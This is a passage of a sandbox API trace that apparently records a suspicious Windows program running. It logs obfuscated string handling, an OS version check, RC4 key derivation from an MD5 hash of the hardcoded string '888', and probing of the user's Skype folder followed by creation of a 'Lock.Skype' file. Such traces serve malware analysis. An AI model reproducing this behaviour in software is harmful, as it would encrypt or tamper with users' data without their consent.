hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.207] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0150.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0150.208] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0150.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0150.208] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.208] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0150.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0150.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f60, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0150.208] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf440) returned 1 [0150.209] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0150.209] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0150.209] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.209] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.209] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0150.209] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0150.209] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.209] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.209] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.209] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.209] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.210] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.210] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.210] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.210] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0150.210] CryptCreateHash (in: hProv=0x9bf440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71bc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.210] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0150.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.210] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0150.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa480, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0150.210] CryptHashData (hHash=0x9e1db8, pbData=0x2a71be8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0150.210] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.211] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.211] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0150.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa288, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0150.211] CryptDeriveKey (in: hProv=0x9bf440, Algid=0x6601, hBaseData=0x9e1db8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20b8) returned 1 [0150.211] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.211] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0150.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0150.211] CryptDestroyHash (hHash=0x9e1db8) returned 1 [0150.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0150.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0150.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.213] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Skype" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0150.213] GetLastError () returned 0x5 [0150.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0150.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0150.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0150.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0150.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.215] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0150.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0150.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0150.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.216] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.Skype" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.skype"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0150.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0150.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0150.216] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0150.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0150.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 